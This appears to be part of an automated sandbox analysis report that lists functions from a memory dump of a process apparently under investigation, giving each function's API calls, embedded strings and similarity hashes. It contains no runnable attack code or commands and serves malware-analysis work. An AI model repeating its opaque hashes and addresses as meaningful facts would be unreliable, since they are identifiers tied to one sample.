                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                      • String ID: advapi32.dll
                                                                                                                                                                                                                      • API String ID: 2012295524-4050573280
                                                                                                                                                                                                                      • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                                                                                                                      • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • <%s>, xrefs: 004100A6
                                                                                                                                                                                                                      • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                                                                      • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$_snwprintf
                                                                                                                                                                                                                      • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                                      • API String ID: 3473751417-2880344631
                                                                                                                                                                                                                      • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                                                      • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                                                      • String ID: %2.2X
                                                                                                                                                                                                                      • API String ID: 2521778956-791839006
                                                                                                                                                                                                                      • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                                                      • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _snwprintfwcscpy
                                                                                                                                                                                                                      • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                                                                      • API String ID: 999028693-502967061
                                                                                                                                                                                                                      • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                                                                      • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memsetstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2350177629-0
                                                                                                                                                                                                                      • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                                                                                      • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                      • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                                                      • API String ID: 2221118986-1606337402
                                                                                                                                                                                                                      • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                                                                                      • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 265355444-0
                                                                                                                                                                                                                      • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                                                                                      • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                                        • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                                        • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                                        • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                                      • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1973883786-0
                                                                                                                                                                                                                      • Opcode ID: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                                                                                                                                                                                      • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004116FF
                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                                                                                                                                                        • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                                                      • API String ID: 2618321458-3614832568
                                                                                                                                                                                                                      • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                                                                      • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004185FC
                                                                                                                                                                                                                      • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@AttributesFilememset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 776155459-0
                                                                                                                                                                                                                      • Opcode ID: 0f4d7603f8fb496cf733ea50d928d497895b02188797bdb70aeae8633e108f7d
                                                                                                                                                                                                                      • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f4d7603f8fb496cf733ea50d928d497895b02188797bdb70aeae8633e108f7d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                                                                                      • malloc.MSVCRT ref: 00417524
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2308052813-0
                                                                                                                                                                                                                      • Opcode ID: 6248b2b7f6a479c554c71b0c61ae383c8a643aca280bf9f33ef5fcf46466946d
                                                                                                                                                                                                                      • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6248b2b7f6a479c554c71b0c61ae383c8a643aca280bf9f33ef5fcf46466946d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                                                                                                                      • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PathTemp$??3@
                                                                                                                                                                                                                      • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                                                                      • API String ID: 1589464350-1420421710
                                                                                                                                                                                                                      • Opcode ID: c8350a72466cbc4bd1e5c41b0b1d0b837946de2a99fd363d48ea7ac73f264160
                                                                                                                                                                                                                      • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8350a72466cbc4bd1e5c41b0b1d0b837946de2a99fd363d48ea7ac73f264160
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FDD5
                                                                                                                                                                                                                        • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                                                                                                                                                                                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                                                                      • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                                      • API String ID: 1775345501-2769808009
                                                                                                                                                                                                                      • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                                                                                      • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00414770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0041477F
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0041479A
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                                                                                      • String ID: General
                                                                                                                                                                                                                      • API String ID: 999786162-26480598
                                                                                                                                                                                                                      • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                                                                      • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                                                                      • String ID: Error$Error %d: %s
                                                                                                                                                                                                                      • API String ID: 313946961-1552265934
                                                                                                                                                                                                                      • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                                                      • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                                                                                      • API String ID: 0-1953309616
                                                                                                                                                                                                                      • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                                      • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
